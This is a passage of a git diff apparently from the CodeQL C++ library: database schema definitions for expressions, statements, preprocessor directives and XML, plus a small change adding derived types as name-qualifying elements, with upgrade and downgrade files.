; + +@p_arith_op_expr = @paddexpr + | @psubexpr + | @pdiffexpr + ; + +@bin_arith_op_expr = @addexpr + | @subexpr + | @mulexpr + | @divexpr + | @remexpr + | @jmulexpr + | @jdivexpr + | @fjaddexpr + | @jfaddexpr + | @fjsubexpr + | @jfsubexpr + | @minexpr + | @maxexpr + | @p_arith_op_expr + ; + +@bin_op_expr = @bin_arith_op_expr + | @bin_bitwise_op_expr + | @cmp_op_expr + | @bin_log_op_expr + ; + +@op_expr = @un_op_expr + | @bin_op_expr + | @assign_expr + | @conditionalexpr + ; + +@assign_arith_expr = @assignaddexpr + | @assignsubexpr + | @assignmulexpr + | @assigndivexpr + | @assignremexpr + ; + +@assign_bitwise_expr = @assignandexpr + | @assignorexpr + | @assignxorexpr + | @assignlshiftexpr + | @assignrshiftexpr + ; + +@assign_pointer_expr = @assignpaddexpr + | @assignpsubexpr + ; + +@assign_op_expr = @assign_arith_expr + | @assign_bitwise_expr + | @assign_pointer_expr + ; + +@assign_expr = @assignexpr | @assign_op_expr | @blockassignexpr + +/* + Binary encoding of the allocator form. + + case @allocator.form of + 0 = plain + | 1 = alignment + ; +*/ + +/** + * The allocator function associated with a `new` or `new[]` expression. + * The `form` column specified whether the allocation call contains an alignment + * argument. + */ +expr_allocator( + unique int expr: @any_new_expr ref, + int func: @function ref, + int form: int ref +); + +/* + Binary encoding of the deallocator form. + + case @deallocator.form of + 0 = plain + | 1 = size + | 2 = alignment + | 4 = destroying_delete + ; +*/ + +/** + * The deallocator function associated with a `delete`, `delete[]`, `new`, or + * `new[]` expression. For a `new` or `new[]` expression, the deallocator is the + * one used to free memory if the initialization throws an exception. + * The `form` column specifies whether the deallocation call contains a size + * argument, and alignment argument, or both. + */ +expr_deallocator( + unique int expr: @new_or_delete_expr ref, + int func: @function ref, + int form: int ref +); + +/** + * Holds if the `@conditionalexpr` is of the two operand form + * `guard ? : false`. + */ +expr_cond_two_operand( + unique int cond: @conditionalexpr ref +); + +/** + * The guard of `@conditionalexpr` `guard ? true : false` + */ +expr_cond_guard( + unique int cond: @conditionalexpr ref, + int guard: @expr ref +); + +/** + * The expression used when the guard of `@conditionalexpr` + * `guard ? true : false` holds. For the two operand form + * `guard ?: false` consider using `expr_cond_guard` instead. + */ +expr_cond_true( + unique int cond: @conditionalexpr ref, + int true: @expr ref +); + +/** + * The expression used when the guard of `@conditionalexpr` + * `guard ? true : false` does not hold. + */ +expr_cond_false( + unique int cond: @conditionalexpr ref, + int false: @expr ref +); + +/** A string representation of the value. */ +values( + unique int id: @value, + string str: string ref +); + +/** The actual text in the source code for the value, if any. */ +valuetext( + unique int id: @value ref, + string text: string ref +); + +valuebind( + int val: @value ref, + unique int expr: @expr ref +); + +fieldoffsets( + unique int id: @variable ref, + int byteoffset: int ref, + int bitoffset: int ref +); + +bitfield( + unique int id: @variable ref, + int bits: int ref, + int declared_bits: int ref +); + +/* TODO +memberprefix( + int member: @expr ref, + int prefix: @expr ref +); +*/ + +/* + kind(1) = mbrcallexpr + kind(2) = mbrptrcallexpr + kind(3) = mbrptrmbrcallexpr + kind(4) = ptrmbrptrmbrcallexpr + kind(5) = mbrreadexpr // x.y + kind(6) = mbrptrreadexpr // p->y + kind(7) = mbrptrmbrreadexpr // x.*pm + kind(8) = mbrptrmbrptrreadexpr // x->*pm + kind(9) = staticmbrreadexpr // static x.y + kind(10) = staticmbrptrreadexpr // static p->y +*/ +/* TODO +memberaccess( + int member: @expr ref, + int kind: int ref +); +*/ + +initialisers( + unique int init: @initialiser, + int var: @accessible ref, + unique int expr: @expr ref, + int location: @location_default ref +); + +braced_initialisers( + int init: @initialiser ref +); + +/** + * An ancestor for the expression, for cases in which we cannot + * otherwise find the expression's parent. + */ +expr_ancestor( + int exp: @expr ref, + int ancestor: @element ref +); + +exprs( + unique int id: @expr, + int kind: int ref, + int location: @location_default ref +); + +expr_reuse( + int reuse: @expr ref, + int original: @expr ref, + int value_category: int ref +) + +/* + case @value.category of + 1 = prval + | 2 = xval + | 3 = lval + ; +*/ +expr_types( + int id: @expr ref, + int typeid: @type ref, + int value_category: int ref +); + +case @expr.kind of + 1 = @errorexpr +| 2 = @address_of // & AddressOfExpr +| 3 = @reference_to // ReferenceToExpr (implicit?) +| 4 = @indirect // * PointerDereferenceExpr +| 5 = @ref_indirect // ReferenceDereferenceExpr (implicit?) +// ... +| 8 = @array_to_pointer // (???) +| 9 = @vacuous_destructor_call // VacuousDestructorCall +// ... +| 11 = @assume // Microsoft +| 12 = @parexpr +| 13 = @arithnegexpr +| 14 = @unaryplusexpr +| 15 = @complementexpr +| 16 = @notexpr +| 17 = @conjugation // GNU ~ operator +| 18 = @realpartexpr // GNU __real +| 19 = @imagpartexpr // GNU __imag +| 20 = @postincrexpr +| 21 = @postdecrexpr +| 22 = @preincrexpr +| 23 = @predecrexpr +| 24 = @conditionalexpr +| 25 = @addexpr +| 26 = @subexpr +| 27 = @mulexpr +| 28 = @divexpr +| 29 = @remexpr +| 30 = @jmulexpr // C99 mul imaginary +| 31 = @jdivexpr // C99 div imaginary +| 32 = @fjaddexpr // C99 add real + imaginary +| 33 = @jfaddexpr // C99 add imaginary + real +| 34 = @fjsubexpr // C99 sub real - imaginary +| 35 = @jfsubexpr // C99 sub imaginary - real +| 36 = @paddexpr // pointer add (pointer + int or int + pointer) +| 37 = @psubexpr // pointer sub (pointer - integer) +| 38 = @pdiffexpr // difference between two pointers +| 39 = @lshiftexpr +| 40 = @rshiftexpr +| 41 = @andexpr +| 42 = @orexpr +| 43 = @xorexpr +| 44 = @eqexpr +| 45 = @neexpr +| 46 = @gtexpr +| 47 = @ltexpr +| 48 = @geexpr +| 49 = @leexpr +| 50 = @minexpr // GNU minimum +| 51 = @maxexpr // GNU maximum +| 52 = @assignexpr +| 53 = @assignaddexpr +| 54 = @assignsubexpr +| 55 = @assignmulexpr +| 56 = @assigndivexpr +| 57 = @assignremexpr +| 58 = @assignlshiftexpr +| 59 = @assignrshiftexpr +| 60 = @assignandexpr +| 61 = @assignorexpr +| 62 = @assignxorexpr +| 63 = @assignpaddexpr // assign pointer add +| 64 = @assignpsubexpr // assign pointer sub +| 65 = @andlogicalexpr +| 66 = @orlogicalexpr +| 67 = @commaexpr +| 68 = @subscriptexpr // access to member of an array, e.g., a[5] +// ... 69 @objc_subscriptexpr deprecated +// ... 70 @cmdaccess deprecated +// ... +| 73 = @virtfunptrexpr +| 74 = @callexpr +// ... 75 @msgexpr_normal deprecated +// ... 76 @msgexpr_super deprecated +// ... 77 @atselectorexpr deprecated +// ... 78 @atprotocolexpr deprecated +| 79 = @vastartexpr +| 80 = @vaargexpr +| 81 = @vaendexpr +| 82 = @vacopyexpr +// ... 83 @atencodeexpr deprecated +| 84 = @varaccess +| 85 = @thisaccess +// ... 86 @objc_box_expr deprecated +| 87 = @new_expr +| 88 = @delete_expr +| 89 = @throw_expr +| 90 = @condition_decl // a variable declared in a condition, e.g., if(int x = y > 2) +| 91 = @braced_init_list +| 92 = @type_id +| 93 = @runtime_sizeof +| 94 = @runtime_alignof +| 95 = @sizeof_pack +| 96 = @expr_stmt // GNU extension +| 97 = @routineexpr +| 98 = @type_operand // used to access a type in certain contexts (haven't found any examples yet....) +| 99 = @offsetofexpr // offsetof ::= type and field +| 100 = @hasassignexpr // __has_assign ::= type +| 101 = @hascopyexpr // __has_copy ::= type +| 102 = @hasnothrowassign // __has_nothrow_assign ::= type +| 103 = @hasnothrowconstr // __has_nothrow_constructor ::= type +| 104 = @hasnothrowcopy // __has_nothrow_copy ::= type +| 105 = @hastrivialassign // __has_trivial_assign ::= type +| 106 = @hastrivialconstr // __has_trivial_constructor ::= type +| 107 = @hastrivialcopy // __has_trivial_copy ::= type +| 108 = @hasuserdestr // __has_user_destructor ::= type +| 109 = @hasvirtualdestr // __has_virtual_destructor ::= type +| 110 = @isabstractexpr // __is_abstract ::= type +| 111 = @isbaseofexpr // __is_base_of ::= type type +| 112 = @isclassexpr // __is_class ::= type +| 113 = @isconvtoexpr // __is_convertible_to ::= type type +| 114 = @isemptyexpr // __is_empty ::= type +| 115 = @isenumexpr // __is_enum ::= type +| 116 = @ispodexpr // __is_pod ::= type +| 117 = @ispolyexpr // __is_polymorphic ::= type +| 118 = @isunionexpr // __is_union ::= type +| 119 = @typescompexpr // GNU __builtin_types_compatible ::= type type +| 120 = @intaddrexpr // frontend internal builtin, used to implement offsetof +// ... +| 122 = @hastrivialdestructor // __has_trivial_destructor ::= type +| 123 = @literal +| 124 = @uuidof +| 127 = @aggregateliteral +| 128 = @delete_array_expr +| 129 = @new_array_expr +// ... 130 @objc_array_literal deprecated +// ... 131 @objc_dictionary_literal deprecated +| 132 = @foldexpr +// ... +| 200 = @ctordirectinit +| 201 = @ctorvirtualinit +| 202 = @ctorfieldinit +| 203 = @ctordelegatinginit +| 204 = @dtordirectdestruct +| 205 = @dtorvirtualdestruct +| 206 = @dtorfielddestruct +// ... +| 210 = @static_cast +| 211 = @reinterpret_cast +| 212 = @const_cast +| 213 = @dynamic_cast +| 214 = @c_style_cast +| 215 = @lambdaexpr +| 216 = @param_ref +| 217 = @noopexpr +// ... +| 294 = @istriviallyconstructibleexpr +| 295 = @isdestructibleexpr +| 296 = @isnothrowdestructibleexpr +| 297 = @istriviallydestructibleexpr +| 298 = @istriviallyassignableexpr +| 299 = @isnothrowassignableexpr +| 300 = @istrivialexpr +| 301 = @isstandardlayoutexpr +| 302 = @istriviallycopyableexpr +| 303 = @isliteraltypeexpr +| 304 = @hastrivialmoveconstructorexpr +| 305 = @hastrivialmoveassignexpr +| 306 = @hasnothrowmoveassignexpr +| 307 = @isconstructibleexpr +| 308 = @isnothrowconstructibleexpr +| 309 = @hasfinalizerexpr +| 310 = @isdelegateexpr +| 311 = @isinterfaceclassexpr +| 312 = @isrefarrayexpr +| 313 = @isrefclassexpr +| 314 = @issealedexpr +| 315 = @issimplevalueclassexpr +| 316 = @isvalueclassexpr +| 317 = @isfinalexpr +| 319 = @noexceptexpr +| 320 = @builtinshufflevector +| 321 = @builtinchooseexpr +| 322 = @builtinaddressof +| 323 = @vec_fill +| 324 = @builtinconvertvector +| 325 = @builtincomplex +| 326 = @spaceshipexpr +| 327 = @co_await +| 328 = @co_yield +| 329 = @temp_init +| 330 = @isassignable +| 331 = @isaggregate +| 332 = @hasuniqueobjectrepresentations +| 333 = @builtinbitcast +| 334 = @builtinshuffle +| 335 = @blockassignexpr +| 336 = @issame +| 337 = @isfunction +| 338 = @islayoutcompatible +| 339 = @ispointerinterconvertiblebaseof +| 340 = @isarray +| 341 = @arrayrank +| 342 = @arrayextent +| 343 = @isarithmetic +| 344 = @iscompletetype +| 345 = @iscompound +| 346 = @isconst +| 347 = @isfloatingpoint +| 348 = @isfundamental +| 349 = @isintegral +| 350 = @islvaluereference +| 351 = @ismemberfunctionpointer +| 352 = @ismemberobjectpointer +| 353 = @ismemberpointer +| 354 = @isobject +| 355 = @ispointer +| 356 = @isreference +| 357 = @isrvaluereference +| 358 = @isscalar +| 359 = @issigned +| 360 = @isunsigned +| 361 = @isvoid +| 362 = @isvolatile +| 363 = @reuseexpr +| 364 = @istriviallycopyassignable +| 365 = @isassignablenopreconditioncheck +| 366 = @referencebindstotemporary +| 367 = @issameas +| 368 = @builtinhasattribute +| 369 = @ispointerinterconvertiblewithclass +| 370 = @builtinispointerinterconvertiblewithclass +| 371 = @iscorrespondingmember +| 372 = @builtiniscorrespondingmember +| 373 = @isboundedarray +| 374 = @isunboundedarray +| 375 = @isreferenceable +| 378 = @isnothrowconvertible +| 379 = @referenceconstructsfromtemporary +| 380 = @referenceconvertsfromtemporary +| 381 = @isconvertible +| 382 = @isvalidwinrttype +| 383 = @iswinclass +| 384 = @iswininterface +| 385 = @istriviallyequalitycomparable +| 386 = @isscopedenum +| 387 = @istriviallyrelocatable +| 388 = @datasizeof +| 389 = @c11_generic +| 390 = @requires_expr +| 391 = @nested_requirement +| 392 = @compound_requirement +| 393 = @concept_id +| 394 = @isinvocable +| 395 = @isnothrowinvocable +| 396 = @isbitwisecloneable +; + +@var_args_expr = @vastartexpr + | @vaendexpr + | @vaargexpr + | @vacopyexpr + ; + +@builtin_op = @var_args_expr + | @noopexpr + | @offsetofexpr + | @intaddrexpr + | @hasassignexpr + | @hascopyexpr + | @hasnothrowassign + | @hasnothrowconstr + | @hasnothrowcopy + | @hastrivialassign + | @hastrivialconstr + | @hastrivialcopy + | @hastrivialdestructor + | @hasuserdestr + | @hasvirtualdestr + | @isabstractexpr + | @isbaseofexpr + | @isclassexpr + | @isconvtoexpr + | @isemptyexpr + | @isenumexpr + | @ispodexpr + | @ispolyexpr + | @isunionexpr + | @typescompexpr + | @builtinshufflevector + | @builtinconvertvector + | @builtinaddressof + | @istriviallyconstructibleexpr + | @isdestructibleexpr + | @isnothrowdestructibleexpr + | @istriviallydestructibleexpr + | @istriviallyassignableexpr + | @isnothrowassignableexpr + | @istrivialexpr + | @isstandardlayoutexpr + | @istriviallycopyableexpr + | @isliteraltypeexpr + | @hastrivialmoveconstructorexpr + | @hastrivialmoveassignexpr + | @hasnothrowmoveassignexpr + | @isconstructibleexpr + | @isnothrowconstructibleexpr + | @hasfinalizerexpr + | @isdelegateexpr + | @isinterfaceclassexpr + | @isrefarrayexpr + | @isrefclassexpr + | @issealedexpr + | @issimplevalueclassexpr + | @isvalueclassexpr + | @isfinalexpr + | @builtinchooseexpr + | @builtincomplex + | @isassignable + | @isaggregate + | @hasuniqueobjectrepresentations + | @builtinbitcast + | @builtinshuffle + | @issame + | @isfunction + | @islayoutcompatible + | @ispointerinterconvertiblebaseof + | @isarray + | @arrayrank + | @arrayextent + | @isarithmetic + | @iscompletetype + | @iscompound + | @isconst + | @isfloatingpoint + | @isfundamental + | @isintegral + | @islvaluereference + | @ismemberfunctionpointer + | @ismemberobjectpointer + | @ismemberpointer + | @isobject + | @ispointer + | @isreference + | @isrvaluereference + | @isscalar + | @issigned + | @isunsigned + | @isvoid + | @isvolatile + | @istriviallycopyassignable + | @isassignablenopreconditioncheck + | @referencebindstotemporary + | @issameas + | @builtinhasattribute + | @ispointerinterconvertiblewithclass + | @builtinispointerinterconvertiblewithclass + | @iscorrespondingmember + | @builtiniscorrespondingmember + | @isboundedarray + | @isunboundedarray + | @isreferenceable + | @isnothrowconvertible + | @referenceconstructsfromtemporary + | @referenceconvertsfromtemporary + | @isconvertible + | @isvalidwinrttype + | @iswinclass + | @iswininterface + | @istriviallyequalitycomparable + | @isscopedenum + | @istriviallyrelocatable + | @isinvocable + | @isnothrowinvocable + | @isbitwisecloneable + ; + +compound_requirement_is_noexcept( + int expr: @compound_requirement ref +); + +new_allocated_type( + unique int expr: @new_expr ref, + int type_id: @type ref +); + +new_array_allocated_type( + unique int expr: @new_array_expr ref, + int type_id: @type ref +); + +param_ref_to_this( + int expr: @param_ref ref +) + +/** + * The field being initialized by an initializer expression within an aggregate + * initializer for a class/struct/union. Position is used to sort repeated initializers. + */ +#keyset[aggregate, position] +aggregate_field_init( + int aggregate: @aggregateliteral ref, + int initializer: @expr ref, + int field: @membervariable ref, + int position: int ref, + boolean is_designated: boolean ref +); + +/** + * The index of the element being initialized by an initializer expression + * within an aggregate initializer for an array. Position is used to sort repeated initializers. + */ +#keyset[aggregate, position] +aggregate_array_init( + int aggregate: @aggregateliteral ref, + int initializer: @expr ref, + int element_index: int ref, + int position: int ref, + boolean is_designated: boolean ref +); + +@ctorinit = @ctordirectinit + | @ctorvirtualinit + | @ctorfieldinit + | @ctordelegatinginit; +@dtordestruct = @dtordirectdestruct + | @dtorvirtualdestruct + | @dtorfielddestruct; + + +condition_decl_bind( + unique int expr: @condition_decl ref, + unique int decl: @declaration ref +); + +typeid_bind( + unique int expr: @type_id ref, + int type_id: @type ref +); + +uuidof_bind( + unique int expr: @uuidof ref, + int type_id: @type ref +); + +@sizeof_or_alignof = @runtime_sizeof | @runtime_alignof | @datasizeof | @sizeof_pack; + +sizeof_bind( + unique int expr: @sizeof_or_alignof ref, + int type_id: @type ref +); + +code_block( + unique int block: @literal ref, + unique int routine: @function ref +); + +lambdas( + unique int expr: @lambdaexpr ref, + string default_capture: string ref, + boolean has_explicit_return_type: boolean ref, + boolean has_explicit_parameter_list: boolean ref +); + +lambda_capture( + unique int id: @lambdacapture, + int lambda: @lambdaexpr ref, + int index: int ref, + int field: @membervariable ref, + boolean captured_by_reference: boolean ref, + boolean is_implicit: boolean ref, + int location: @location_default ref +); + +@funbindexpr = @routineexpr + | @new_expr + | @delete_expr + | @delete_array_expr + | @ctordirectinit + | @ctorvirtualinit + | @ctordelegatinginit + | @dtordirectdestruct + | @dtorvirtualdestruct; + +@varbindexpr = @varaccess | @ctorfieldinit | @dtorfielddestruct; +@addressable = @function | @variable ; +@accessible = @addressable | @enumconstant ; + +@access = @varaccess | @routineexpr ; + +fold( + int expr: @foldexpr ref, + string operator: string ref, + boolean is_left_fold: boolean ref +); + +stmts( + unique int id: @stmt, + int kind: int ref, + int location: @location_default ref +); + +case @stmt.kind of + 1 = @stmt_expr +| 2 = @stmt_if +| 3 = @stmt_while +| 4 = @stmt_goto +| 5 = @stmt_label +| 6 = @stmt_return +| 7 = @stmt_block +| 8 = @stmt_end_test_while // do { ... } while ( ... ) +| 9 = @stmt_for +| 10 = @stmt_switch_case +| 11 = @stmt_switch +| 13 = @stmt_asm // "asm" statement or the body of an asm function +| 15 = @stmt_try_block +| 16 = @stmt_microsoft_try // Microsoft +| 17 = @stmt_decl +| 18 = @stmt_set_vla_size // C99 +| 19 = @stmt_vla_decl // C99 +| 25 = @stmt_assigned_goto // GNU +| 26 = @stmt_empty +| 27 = @stmt_continue +| 28 = @stmt_break +| 29 = @stmt_range_based_for // C++11 +// ... 30 @stmt_at_autoreleasepool_block deprecated +// ... 31 @stmt_objc_for_in deprecated +// ... 32 @stmt_at_synchronized deprecated +| 33 = @stmt_handler +// ... 34 @stmt_finally_end deprecated +| 35 = @stmt_constexpr_if +| 37 = @stmt_co_return +| 38 = @stmt_consteval_if +| 39 = @stmt_not_consteval_if +| 40 = @stmt_leave +; + +type_vla( + int type_id: @type ref, + int decl: @stmt_vla_decl ref +); + +variable_vla( + int var: @variable ref, + int decl: @stmt_vla_decl ref +); + +type_is_vla(unique int type_id: @derivedtype ref) + +if_initialization( + unique int if_stmt: @stmt_if ref, + int init_id: @stmt ref +); + +if_then( + unique int if_stmt: @stmt_if ref, + int then_id: @stmt ref +); + +if_else( + unique int if_stmt: @stmt_if ref, + int else_id: @stmt ref +); + +constexpr_if_initialization( + unique int constexpr_if_stmt: @stmt_constexpr_if ref, + int init_id: @stmt ref +); + +constexpr_if_then( + unique int constexpr_if_stmt: @stmt_constexpr_if ref, + int then_id: @stmt ref +); + +constexpr_if_else( + unique int constexpr_if_stmt: @stmt_constexpr_if ref, + int else_id: @stmt ref +); + +@stmt_consteval_or_not_consteval_if = @stmt_consteval_if | @stmt_not_consteval_if; + +consteval_if_then( + unique int constexpr_if_stmt: @stmt_consteval_or_not_consteval_if ref, + int then_id: @stmt ref +); + +consteval_if_else( + unique int constexpr_if_stmt: @stmt_consteval_or_not_consteval_if ref, + int else_id: @stmt ref +); + +while_body( + unique int while_stmt: @stmt_while ref, + int body_id: @stmt ref +); + +do_body( + unique int do_stmt: @stmt_end_test_while ref, + int body_id: @stmt ref +); + +switch_initialization( + unique int switch_stmt: @stmt_switch ref, + int init_id: @stmt ref +); + +#keyset[switch_stmt, index] +switch_case( + int switch_stmt: @stmt_switch ref, + int index: int ref, + int case_id: @stmt_switch_case ref +); + +switch_body( + unique int switch_stmt: @stmt_switch ref, + int body_id: @stmt ref +); + +@stmt_for_or_range_based_for = @stmt_for + | @stmt_range_based_for; + +for_initialization( + unique int for_stmt: @stmt_for_or_range_based_for ref, + int init_id: @stmt ref +); + +for_condition( + unique int for_stmt: @stmt_for ref, + int condition_id: @expr ref +); + +for_update( + unique int for_stmt: @stmt_for ref, + int update_id: @expr ref +); + +for_body( + unique int for_stmt: @stmt_for ref, + int body_id: @stmt ref +); + +@stmtparent = @stmt | @expr_stmt ; +stmtparents( + unique int id: @stmt ref, + int index: int ref, + int parent: @stmtparent ref +); + +ishandler(unique int block: @stmt_block ref); + +@cfgnode = @stmt | @expr | @function | @initialiser ; + +stmt_decl_bind( + int stmt: @stmt_decl ref, + int num: int ref, + int decl: @declaration ref +); + +stmt_decl_entry_bind( + int stmt: @stmt_decl ref, + int num: int ref, + int decl_entry: @element ref +); + +@parameterized_element = @function | @stmt_block | @requires_expr; + +blockscope( + unique int block: @stmt_block ref, + int enclosing: @parameterized_element ref +); + +@jump = @stmt_goto | @stmt_break | @stmt_continue | @stmt_leave; + +@jumporlabel = @jump | @stmt_label | @literal; + +jumpinfo( + unique int id: @jumporlabel ref, + string str: string ref, + int target: @stmt ref +); + +preprocdirects( + unique int id: @preprocdirect, + int kind: int ref, + int location: @location_default ref +); +case @preprocdirect.kind of + 0 = @ppd_if +| 1 = @ppd_ifdef +| 2 = @ppd_ifndef +| 3 = @ppd_elif +| 4 = @ppd_else +| 5 = @ppd_endif +| 6 = @ppd_plain_include +| 7 = @ppd_define +| 8 = @ppd_undef +| 9 = @ppd_line +| 10 = @ppd_error +| 11 = @ppd_pragma +| 12 = @ppd_objc_import +| 13 = @ppd_include_next +| 14 = @ppd_ms_import +| 15 = @ppd_elifdef +| 16 = @ppd_elifndef +| 17 = @ppd_embed +| 18 = @ppd_warning +; + +@ppd_include = @ppd_plain_include | @ppd_objc_import | @ppd_include_next | @ppd_ms_import; + +@ppd_branch = @ppd_if | @ppd_ifdef | @ppd_ifndef | @ppd_elif | @ppd_elifdef | @ppd_elifndef; + +preprocpair( + int begin : @ppd_branch ref, + int elseelifend : @preprocdirect ref +); + +preproctrue(int branch : @ppd_branch ref); +preprocfalse(int branch : @ppd_branch ref); + +preproctext( + unique int id: @preprocdirect ref, + string head: string ref, + string body: string ref +); + +includes( + unique int id: @ppd_include ref, + int included: @file ref +); + +embeds( + unique int id: @ppd_embed ref, + int included: @file ref +); + +link_targets( + int id: @link_target, + int binary: @file ref +); + +link_parent( + int element : @element ref, + int link_target : @link_target ref +); + +/*- Database metadata -*/ + +/** + * The CLI will automatically emit applicable tuples for this table, + * such as `databaseMetadata("isOverlay", "true")` when building an + * overlay database. + */ +databaseMetadata( + string metadataKey: string ref, + string value: string ref +); + +/*- Overlay support -*/ + +/** + * The CLI will automatically emit tuples for each new/modified/deleted file + * when building an overlay database. + */ +overlayChangedFiles( + string path: string ref +); + +/*- XML Files -*/ + +xmlEncoding( + unique int id: @file ref, + string encoding: string ref +); + +xmlDTDs( + unique int id: @xmldtd, + string root: string ref, + string publicId: string ref, + string systemId: string ref, + int fileid: @file ref +); + +xmlElements( + unique int id: @xmlelement, + string name: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int fileid: @file ref +); + +xmlAttrs( + unique int id: @xmlattribute, + int elementid: @xmlelement ref, + string name: string ref, + string value: string ref, + int idx: int ref, + int fileid: @file ref +); + +xmlNs( + int id: @xmlnamespace, + string prefixName: string ref, + string URI: string ref, + int fileid: @file ref +); + +xmlHasNs( + int elementId: @xmlnamespaceable ref, + int nsId: @xmlnamespace ref, + int fileid: @file ref +); + +xmlComments( + unique int id: @xmlcomment, + string text: string ref, + int parentid: @xmlparent ref, + int fileid: @file ref +); + +xmlChars( + unique int id: @xmlcharacters, + string text: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int isCDATA: int ref, + int fileid: @file ref +); + +@xmlparent = @file | @xmlelement; +@xmlnamespaceable = @xmlelement | @xmlattribute; + +xmllocations( + int xmlElement: @xmllocatable ref, + int location: @location_default ref +); + +@xmllocatable = @xmlcharacters | @xmlelement | @xmlcomment | @xmlattribute | @xmldtd | @file | @xmlnamespace; diff --git a/cpp/downgrades/0853f43dc8c08deecb473c54a2b70da8597f1ab5/upgrade.properties b/cpp/downgrades/0853f43dc8c08deecb473c54a2b70da8597f1ab5/upgrade.properties new file mode 100644 index 000000000000..d3a842d2cbb5 --- /dev/null +++ b/cpp/downgrades/0853f43dc8c08deecb473c54a2b70da8597f1ab5/upgrade.properties @@ -0,0 +1,2 @@ +description: Fix NameQualifier inconsistency +compatibility: full diff --git a/cpp/ql/lib/semmle/code/cpp/Type.qll b/cpp/ql/lib/semmle/code/cpp/Type.qll index fa2d2d605d87..4069b58134be 100644 --- a/cpp/ql/lib/semmle/code/cpp/Type.qll +++ b/cpp/ql/lib/semmle/code/cpp/Type.qll @@ -1071,7 +1071,7 @@ class NullPointerType extends BuiltInType { * const float fa[40]; * ``` */ -class DerivedType extends Type, @derivedtype { +class DerivedType extends Type, NameQualifyingElement, @derivedtype { override string toString() { result = this.getName() } override string getName() { derivedtypes(underlyingElement(this), result, _, _) } diff --git a/cpp/ql/lib/semmlecode.cpp.dbscheme b/cpp/ql/lib/semmlecode.cpp.dbscheme index ef8d209a22e2..0853f43dc8c0 100644 --- a/cpp/ql/lib/semmlecode.cpp.dbscheme +++ b/cpp/ql/lib/semmlecode.cpp.dbscheme @@ -1430,7 +1430,8 @@ specialnamequalifyingelements( @namequalifyingelement = @namespace | @specialnamequalifyingelement | @usertype - | @decltype; + | @decltype + | @derivedtype; namequalifiers( unique int id: @namequalifier, diff --git a/cpp/ql/lib/upgrades/ef8d209a22e27413aaaeff4446f0ecb9fa2c227b/old.dbscheme b/cpp/ql/lib/upgrades/ef8d209a22e27413aaaeff4446f0ecb9fa2c227b/old.dbscheme new file mode 100644 index 000000000000..ef8d209a22e2 --- /dev/null +++ b/cpp/ql/lib/upgrades/ef8d209a22e27413aaaeff4446f0ecb9fa2c227b/old.dbscheme @@ -0,0 +1,2577 @@ + +/*- Compilations -*/ + +/** + * An invocation of the compiler. Note that more than one file may be + * compiled per invocation. For example, this command compiles three + * source files: + * + * gcc -c f1.c f2.c f3.c + * + * The `id` simply identifies the invocation, while `cwd` is the working + * directory from which the compiler was invoked. + */ +compilations( + /** + * An invocation of the compiler. Note that more than one file may + * be compiled per invocation. For example, this command compiles + * three source files: + * + * gcc -c f1.c f2.c f3.c + */ + unique int id : @compilation, + string cwd : string ref +); + +/** + * The arguments that were passed to the extractor for a compiler + * invocation. If `id` is for the compiler invocation + * + * gcc -c f1.c f2.c f3.c + * + * then typically there will be rows for + * + * num | arg + * --- | --- + * 0 | *path to extractor* + * 1 | `--mimic` + * 2 | `/usr/bin/gcc` + * 3 | `-c` + * 4 | f1.c + * 5 | f2.c + * 6 | f3.c + */ +#keyset[id, num] +compilation_args( + int id : @compilation ref, + int num : int ref, + string arg : string ref +); + +/** + * The expanded arguments that were passed to the extractor for a + * compiler invocation. This is similar to `compilation_args`, but + * for a `@someFile` argument, it includes the arguments from that + * file, rather than just taking the argument literally. + */ +#keyset[id, num] +compilation_expanded_args( + int id : @compilation ref, + int num : int ref, + string arg : string ref +); + +/** + * Optionally, record the build mode for each compilation. + */ +compilation_build_mode( + unique int id : @compilation ref, + int mode : int ref +); + +/* +case @compilation_build_mode.mode of + 0 = @build_mode_none +| 1 = @build_mode_manual +| 2 = @build_mode_auto +; +*/ + +/** + * The source files that are compiled by a compiler invocation. + * If `id` is for the compiler invocation + * + * gcc -c f1.c f2.c f3.c + * + * then there will be rows for + * + * num | arg + * --- | --- + * 0 | f1.c + * 1 | f2.c + * 2 | f3.c + * + * Note that even if those files `#include` headers, those headers + * do not appear as rows. + */ +#keyset[id, num] +compilation_compiling_files( + int id : @compilation ref, + int num : int ref, + int file : @file ref +); + +/** + * The time taken by the extractor for a compiler invocation. + * + * For each file `num`, there will be rows for + * + * kind | seconds + * ---- | --- + * 1 | CPU seconds used by the extractor frontend + * 2 | Elapsed seconds during the extractor frontend + * 3 | CPU seconds used by the extractor backend + * 4 | Elapsed seconds during the extractor backend + */ +#keyset[id, num, kind] +compilation_time( + int id : @compilation ref, + int num : int ref, + /* kind: + 1 = frontend_cpu_seconds + 2 = frontend_elapsed_seconds + 3 = extractor_cpu_seconds + 4 = extractor_elapsed_seconds + */ + int kind : int ref, + float seconds : float ref +); + +/** + * An error or warning generated by the extractor. + * The diagnostic message `diagnostic` was generated during compiler + * invocation `compilation`, and is the `file_number_diagnostic_number`th + * message generated while extracting the `file_number`th file of that + * invocation. + */ +#keyset[compilation, file_number, file_number_diagnostic_number] +diagnostic_for( + int diagnostic : @diagnostic ref, + int compilation : @compilation ref, + int file_number : int ref, + int file_number_diagnostic_number : int ref +); + +/** + * If extraction was successful, then `cpu_seconds` and + * `elapsed_seconds` are the CPU time and elapsed time (respectively) + * that extraction took for compiler invocation `id`. + */ +compilation_finished( + unique int id : @compilation ref, + float cpu_seconds : float ref, + float elapsed_seconds : float ref +); + +/*- External data -*/ + +/** + * External data, loaded from CSV files during snapshot creation. See + * [Tutorial: Incorporating external data](https://help.semmle.com/wiki/display/SD/Tutorial%3A+Incorporating+external+data) + * for more information. + */ +externalData( + int id : @externalDataElement, + string path : string ref, + int column: int ref, + string value : string ref +); + +/*- Source location prefix -*/ + +/** + * The source location of the snapshot. + */ +sourceLocationPrefix(string prefix : string ref); + +/*- Files and folders -*/ + +/** + * The location of an element. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `file`. + * For more information, see + * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ +locations_default( + unique int id: @location_default, + int file: @file ref, + int beginLine: int ref, + int beginColumn: int ref, + int endLine: int ref, + int endColumn: int ref +); + +files( + unique int id: @file, + string name: string ref +); + +folders( + unique int id: @folder, + string name: string ref +); + +@container = @file | @folder + +containerparent( + int parent: @container ref, + unique int child: @container ref +); + +/*- Lines of code -*/ + +numlines( + int element_id: @sourceline ref, + int num_lines: int ref, + int 